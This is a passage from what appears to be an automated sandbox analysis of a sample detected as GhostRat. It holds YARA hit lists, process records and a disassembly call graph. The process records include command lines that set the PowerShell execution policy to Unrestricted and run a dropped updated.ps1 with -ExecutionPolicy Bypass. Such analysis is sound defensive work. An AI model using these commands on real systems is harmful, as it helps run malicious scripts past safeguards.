                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 24%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:01:15:02
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:01:15:03
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:16
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:20
                                                                                  Start time:01:15:29
                                                                                  Start date:08/01/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                  Imagebase:0x690000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.6%
                                                                                    Dynamic/Decrypted Code Coverage:73.7%
                                                                                    Signature Coverage:8.9%
                                                                                    Total number of Nodes:1075
                                                                                    Total number of Limit Nodes:28
                                                                                    execution_graph 28913 100018d0 28914 100018f1 GetModuleHandleA CreateWindowExW SetWindowTheme SendMessageW malloc 28913->28914 28915 100018e2 28913->28915 28923 10002b60 28914->28923 28916 100019c2 PostQuitMessage 28915->28916 28917 100018ec DefWindowProcW 28915->28917 28921 100019e5 28916->28921 28917->28921 28922 100019a2 CreateThread 28922->28921 28925 100019f0 28922->28925 28924 10002b6f Concurrency::task_continuation_context::task_continuation_context 28923->28924 28924->28922 28928 10002090 28925->28928 28927 10001a13 28970 10017290 28928->28970 28931 10002143 SendMessageW 28932 1000215a InternetReadFile 28931->28932 28933 1000223c 7 API calls 28932->28933 28935 1000217c 28932->28935 28937 100022b4 28933->28937 28934 10002186 fwrite 28934->28935 28935->28932 28935->28933 28935->28934 28936 10002226 SendMessageW 28935->28936 28936->28935 28972 10001d80 VariantClear 28937->28972 28939 10002776 28973 10001d80 VariantClear 28939->28973 28941 10002785 28974 10001d80 VariantClear 28941->28974 28943 10002794 28975 10001d80 VariantClear 28943->28975 28945 100027a6 28976 10001a20 28945->28976 28947 100027cc 28981 10001b40 28947->28981 28950 10002926 exit 28950->28927 28953 10002915 Sleep 28953->28950 28954 1000284d 28989 10001e30 6 API calls 28954->28989 28956 1000285b 28957 10002913 28956->28957 28958 1000287a Sleep 28956->28958 28957->28950 28962 10002867 28958->28962 28962->28956 28963 100028cf 28962->28963 28990 10002da0 28962->28990 28994 10001fa0 17 API calls 28962->28994 28995 10002cb0 28962->28995 28998 100029f0 8 API calls 2 library calls 28963->28998 28965 100028df 28999 10001f10 6 API calls 28965->28999 28967 100028f6 29000 10002960 28967->29000 28969 1000290b 28969->28957 28971 100020c6 InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 28970->28971 28971->28931 28971->28932 28972->28939 28973->28941 28974->28943 28975->28945 29003 10001350 28976->29003 28980 10001a64 _com_issue_error 28980->28947 29015 10001b90 28981->29015 28984 10001da0 29020 10001ab0 28984->29020 28986 10001dd9 28987 10001b40 SysFreeString 28986->28987 28988 10001e15 28987->28988 28988->28953 28988->28954 28989->28956 28991 10002dd1 HandleT _Error_objects 28990->28991 29026 10003ee0 28991->29026 28993 10002dfa 28993->28962 28994->28962 29041 10003230 28995->29041 28997 10002cbf 28997->28962 28998->28965 28999->28967 29046 10002fb0 29000->29046 29002 1000296f 29002->28969 29007 10015fe6 29003->29007 29006 10001bc0 13 API calls 29006->28980 29008 10015ff8 malloc 29007->29008 29009 1000135c 29008->29009 29010 10015feb _callnewh 29008->29010 29009->28980 29009->29006 29010->29008 29012 10016007 allocator 29010->29012 29011 10016704 stdext::threads::lock_error::lock_error 29013 10016712 _CxxThrowException 29011->29013 29012->29011 29014 100166f5 _CxxThrowException 29012->29014 29014->29011 29016 10001b4f 29015->29016 29017 10001b9f 29015->29017 29016->28950 29016->28984 29019 10001c50 SysFreeString _MallocaArrayHolder 29017->29019 29019->29016 29021 10001350 allocator 4 API calls 29020->29021 29022 10001ad5 29021->29022 29024 10001af4 _com_issue_error 29022->29024 29025 10001c00 SysAllocString _com_issue_error 29022->29025 29024->28986 29025->29024 29027 10003ef7 Concurrency::task_continuation_context::task_continuation_context 29026->29027 29029 10003f01 Concurrency::task_continuation_context::task_continuation_context 29027->29029 29037 10001410 ?_Xlength_error@std@@YAXPBD 29027->29037 29030 10003f2b 29029->29030 29032 10003f77 Concurrency::task_continuation_context::task_continuation_context 29029->29032 29038 100036d0 memcpy 29030->29038 29039 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 29032->29039 29034 10003f9e HandleT Concurrency::task_continuation_context::task_continuation_context 29040 100036d0 memcpy 29034->29040 29036 10003f4f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 29036->28993 29037->29029 29038->29036 29039->29034 29040->29036 29042 10003247 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29041->29042 29044 10003278 Concurrency::task_continuation_context::task_continuation_context 29042->29044 29045 10003910 _invalid_parameter_noinfo_noreturn allocator 29042->29045 29044->28997 29045->29044 29047 10002fc7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 29046->29047 29049 10002ff8 29047->29049 29050 100037c0 _invalid_parameter_noinfo_noreturn allocator 29047->29050 29049->29002 29050->29049 29051 65c4a4 29063 40ec94 GetModuleHandleW 29051->29063 29055 65c502 29068 5a2f2c SendMessageW 29055->29068 29057 65c519 29069 6511e0 287 API calls 29057->29069 29059 65c51e 29070 5a2a3c SetWindowTextW SetWindowTextW 29059->29070 29061 65c552 ShowWindow 29062 65c59e 29061->29062 29064 40eccf 29063->29064 29071 40817c 29064->29071 29066 40ecdb GetWindowLongW SetWindowLongW SetErrorMode 29067 651170 GetProcAddress GetProcAddress GetModuleHandleW 29066->29067 29067->29055 29068->29057 29069->29059 29070->29061 29072 4081b4 29071->29072 29075 408110 29072->29075 29076 408158 29075->29076 29077 408120 29075->29077 29076->29066 29077->29076 29079 40e56c GetSystemInfo 29077->29079 29079->29077 29080 650467 29081 650482 29080->29081 29100 5a2a3c SetWindowTextW SetWindowTextW 29081->29100 29083 650529 29216 5afdc4 GetFileAttributesW 29083->29216 29085 650533 29086 650537 29085->29086 29087 65055b 29085->29087 29217 64e240 67 API calls 29086->29217 29089 650574 29087->29089 29090 650564 29087->29090 29101 64f1dc 29089->29101 29219 64ebbc 15 API calls 29090->29219 29092 650556 29218 426460 64 API calls 29092->29218 29094 650572 29221 600808 GetWindowLongW DestroyWindow SendMessageW 29094->29221 29096 650569 29096->29094 29220 64ed7c 90 API calls 29096->29220 29099 650597 29100->29083 29102 64f20f 29101->29102 29103 64f226 29102->29103 29104 64f22d 29102->29104 29251 646274 6 API calls 29103->29251 29106 64f25f 29104->29106 29107 64f26b 29104->29107 29252 600654 25 API calls 29106->29252 29109 64f295 29107->29109 29111 64f297 29107->29111 29112 64f28b 29107->29112 29222 6013d8 57 API calls 29109->29222 29254 60137c 58 API calls 29111->29254 29253 601198 62 API calls 29112->29253 29114 64f2e2 29223 6013d8 57 API calls 29114->29223 29117 64f2fd 29224 6013d8 57 API calls 29117->29224 29119 64f318 29225 5b03f8 GetCommandLineW 29119->29225 29121 64f320 29226 6013d8 57 API calls 29121->29226 29123 64f338 29227 646424 57 API calls 29123->29227 29125 64f33d 29228 64eb08 15 API calls 29125->29228 29127 64f344 29229 620f38 MultiByteToWideChar LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29127->29229 29129 64f417 29230 64eb08 15 API calls 29129->29230 29130 64f370 29133 64f3d3 29130->29133 29255 646d0c 67 API calls 29130->29255 29132 64f430 29231 61e7a8 MultiByteToWideChar 29132->29231 29133->29129 29257 646d0c 67 API calls 29133->29257 29137 64f3ce 29256 426460 64 API calls 29137->29256 29138 64f44e 29143 64f45c 29138->29143 29259 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29138->29259 29139 64f412 29258 426460 64 API calls 29139->29258 29232 647340 57 API calls 29143->29232 29145 64f493 29147 64f4b2 29145->29147 29260 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29145->29260 29261 64449c 125 API calls 29147->29261 29149 64f4c7 29150 64f5fc 29149->29150 29233 643e0c 58 API calls 29149->29233 29152 64f68d 29150->29152 29265 63b45c 80 API calls 29150->29265 29154 64f6c7 29152->29154 29268 64e240 67 API calls 29152->29268 29153 64f4d6 29234 6447d4 29153->29234 29270 64e97c 80 API calls 29154->29270 29158 64f655 29158->29152 29266 6013d8 57 API calls 29158->29266 29160 64f6bd 29160->29154 29269 426460 64 API calls 29160->29269 29163 64f688 29267 426460 64 API calls 29163->29267 29166 64f703 29168 64f705 Sleep 29166->29168 29169 64f722 29166->29169 29274 5a2ef0 166 API calls 29168->29274 29275 5b1cf8 GetProcAddress GetProcAddress GetModuleHandleW GetModuleHandleW 29169->29275 29170 64f6d0 29170->29166 29271 64e240 67 API calls 29170->29271 29272 426460 64 API calls 29170->29272 29273 61e7f0 6 API calls 29170->29273 29174 64f751 29276 64e074 96 API calls 29174->29276 29176 64f756 29277 64e97c 80 API calls 29176->29277 29177 64f4db 29262 64f0c4 107 API calls 29177->29262 29179 64f75f GetTickCount 29181 64f783 29179->29181 29278 60165c 57 API calls 29181->29278 29182 64f55d 29263 63acfc MultiByteToWideChar DestroyIcon LoadCursorW LoadCursorW 29182->29263 29185 64f569 29264 63adf4 77 API calls 29185->29264 29187 64f838 29282 60165c 57 API calls 29187->29282 29189 64f88a 29190 64f8c2 29189->29190 29283 5a2ef0 166 API calls 29189->29283 29284 64e97c 80 API calls 29190->29284 29191 64f7a9 29191->29187 29193 64f7f3 29191->29193 29194 64f85d 29191->29194 29279 63b45c 80 API calls 29193->29279 29281 6013d8 57 API calls 29194->29281 29197 64f89f GetTickCount 29197->29190 29200 64f8ae MsgWaitForMultipleObjects 29197->29200 29199 64f826 29199->29187 29280 6013d8 57 API calls 29199->29280 29200->29189 29201 64f8e1 29202 64f8e7 29201->29202 29203 64f923 29201->29203 29205 64f921 29202->29205 29285 64e240 67 API calls 29202->29285 29206 64f953 29203->29206 29286 64e240 67 API calls 29203->29286 29288 64e97c 80 API calls 29205->29288 29206->29205 29287 6013d8 57 API calls 29206->29287 29211 64f975 29212 64fa16 29211->29212 29289 63b1f4 80 API calls 29211->29289 29290 5b1d88 GetProcAddress GetProcAddress GetModuleHandleW 29212->29290 29215 64fa4b 29215->29094 29216->29085 29217->29092 29219->29096 29220->29094 29221->29099 29222->29114 29223->29117 29224->29119 29225->29121 29226->29123 29227->29125 29228->29127 29229->29130 29230->29132 29231->29138 29232->29145 29233->29153 29291 5b09c4 GetSystemDirectoryW 29234->29291 29236 6447f8 29292 5b09c4 GetSystemDirectoryW 29236->29292 29238 64481b 29293 428614 SetErrorMode 29238->29293 29240 644840 29241 428614 2 API calls 29240->29241 29242 64484d 29241->29242 29243 644880 29242->29243 29296 421a6c 29242->29296 29300 411e58 GetProcAddress GetProcAddress 29243->29300 29248 644890 29250 6448a6 29248->29250 29301 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29248->29301 29250->29177 29251->29104 29252->29107 29253->29109 29254->29109 29255->29137 29257->29139 29259->29143 29260->29147 29261->29149 29262->29182 29263->29185 29264->29150 29265->29158 29266->29163 29268->29160 29270->29170 29271->29170 29273->29170 29274->29166 29275->29174 29276->29176 29277->29179 29278->29191 29279->29199 29280->29187 29281->29187 29282->29189 29283->29197 29284->29201 29285->29205 29286->29206 29287->29205 29288->29211 29289->29212 29290->29215 29291->29236 29292->29238 29302 4097c8 29293->29302 29304 421a94 29296->29304 29299 5f8384 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29299->29243 29300->29248 29301->29250 29303 4097ce LoadLibraryW 29302->29303 29303->29240 29307 421ac4 29304->29307 29306 421a8c 29306->29299 29308 421acd 29307->29308 29311 421b2d 29308->29311 29313 42197c 29308->29313 29310 421b94 29310->29306 29311->29310 29312 42197c 9 API calls 29311->29312 29312->29311 29316 421dfc 29313->29316 29326 4221fc 29316->29326 29318 421e11 VirtualAlloc WSAStartup socket 29319 421e7e VirtualProtect WriteProcessMemory connect 29318->29319 29321 42209f 29319->29321 29322 4220a8 recv 29321->29322 29323 4220ec closesocket 29321->29323 29322->29321 29324 4220d4 29322->29324 29325 421995 29323->29325 29324->29323 29324->29325 29325->29311 29327 422223 29326->29327 29328 4222b6 LoadLibraryA 29327->29328 29329 4222f7 29328->29329 29329->29318 29330 403f88 29331 4041e8 29330->29331 29341 403fa0 29330->29341 29332 404300 29331->29332 29338 4041ac 29331->29338 29333 403d34 VirtualAlloc 29332->29333 29334 404309 29332->29334 29335 403d6f 29333->29335 29336 403d5f 29333->29336 29354 403ce8 Sleep Sleep 29336->29354 29337 403fc1 29340 4041c6 Sleep 29338->29340 29343 404206 29338->29343 29339 403fb2 29339->29337 29344 4040a0 29339->29344 29348 404081 Sleep 29339->29348 29340->29343 29345 4041dc Sleep 29340->29345 29341->29339 29346 40403d Sleep 29341->29346 29349 403c6c VirtualAlloc 29343->29349 29350 404224 29343->29350 29353 4040ac 29344->29353 29355 403c6c 29344->29355 29345->29338 29346->29339 29347 404053 Sleep 29346->29347 29347->29341 29348->29344 29352 404097 Sleep 29348->29352 29349->29350 29352->29339 29354->29335 29359 403c00 29355->29359 29357 403c75 VirtualAlloc 29358 403c8c 29357->29358 29358->29353 29360 403ba0 29359->29360 29360->29357 29361 40e4b8 29363 40e4c0 29361->29363 29362 40e50d 29363->29362 29366 40b968 29363->29366 29365 40e4fc LoadStringW 29365->29362 29367 40b995 29366->29367 29368 40b976 29366->29368 29367->29365 29368->29367 29371 40b920 29368->29371 29372 40b930 GetModuleFileNameW 29371->29372 29373 40b94c 29371->29373 29375 40cbac GetModuleFileNameW 29372->29375 29373->29365 29376 40cbfa 29375->29376 29381 40ca88 29376->29381 29378 40cc26 29379 40cc38 LoadLibraryExW 29378->29379 29380 40cc40 29378->29380 29379->29380 29380->29373 29383 40caa9 29381->29383 29382 40cb31 29382->29378 29383->29382 29399 40c7ac 29383->29399 29385 40cb1e 29386 40cb33 GetUserDefaultUILanguage 29385->29386 29387 40cb24 29385->29387 29405 40c15c EnterCriticalSection 29386->29405 29388 40c8d8 2 API calls 29387->29388 29388->29382 29390 40cb40 29425 40c8d8 29390->29425 29392 40cb4d 29393 40cb75 29392->29393 29394 40cb5b GetSystemDefaultUILanguage 29392->29394 29393->29382 29429 40c9bc 29393->29429 29395 40c15c 17 API calls 29394->29395 29397 40cb68 29395->29397 29398 40c8d8 2 API calls 29397->29398 29398->29393 29400 40c7e0 29399->29400 29401 40c7ce 29399->29401 29400->29385 29437 40c490 29401->29437 29403 40c7d8 29458 40c810 18 API calls 29403->29458 29406 40c1a8 LeaveCriticalSection 29405->29406 29407 40c188 29405->29407 29460 408718 29406->29460 29409 40c199 LeaveCriticalSection 29407->29409 29419 40c24a 29409->29419 29410 40c1b9 IsValidLocale 29411 40c217 EnterCriticalSection 29410->29411 29412 40c1c8 29410->29412 29415 40c22f 29411->29415 29413 40c1d1 29412->29413 29414 40c1dc 29412->29414 29462 40c040 6 API calls 29413->29462 29463 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 29414->29463 29420 40c240 LeaveCriticalSection 29415->29420 29418 40c1e5 GetSystemDefaultUILanguage 29418->29411 29421 40c1ef 29418->29421 29419->29390 29420->29419 29422 40c200 GetSystemDefaultUILanguage 29421->29422 29464 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 29422->29464 29424 40c1da 29424->29411 29426 40c8f7 29425->29426 29427 40c983 29426->29427 29465 40c86c 29426->29465 29427->29392 29470 4087fc 29429->29470 29432 40ca0c 29433 40c86c 2 API calls 29432->29433 29434 40ca20 29433->29434 29435 40ca4e 29434->29435 29436 40c86c 2 API calls 29434->29436 29435->29382 29436->29435 29438 40c4a7 29437->29438 29439 40c4bb GetModuleFileNameW 29438->29439 29440 40c4d0 29438->29440 29439->29440 29441 40c4f8 RegOpenKeyExW 29440->29441 29447 40c69f 29440->29447 29442 40c5b9 29441->29442 29443 40c51f RegOpenKeyExW 29441->29443 29459 40c2a0 7 API calls 29442->29459 29443->29442 29444 40c53d RegOpenKeyExW 29443->29444 29444->29442 29448 40c55b RegOpenKeyExW 29444->29448 29446 40c5d7 RegQueryValueExW 29449 40c5f5 29446->29449 29450 40c628 RegQueryValueExW 29446->29450 29447->29403 29448->29442 29451 40c579 RegOpenKeyExW 29448->29451 29454 40c5fd RegQueryValueExW 29449->29454 29452 40c644 29450->29452 29457 40c626 29450->29457 29451->29442 29453 40c597 RegOpenKeyExW 29451->29453 29455 40c64c RegQueryValueExW 29452->29455 29453->29442 29453->29447 29454->29457 29455->29457 29456 40c68e RegCloseKey 29456->29403 29457->29456 29458->29400 29459->29446 29461 40871e 29460->29461 29461->29410 29462->29424 29463->29418 29464->29424 29466 40c881 29465->29466 29467 40c89e FindFirstFileW 29466->29467 29468 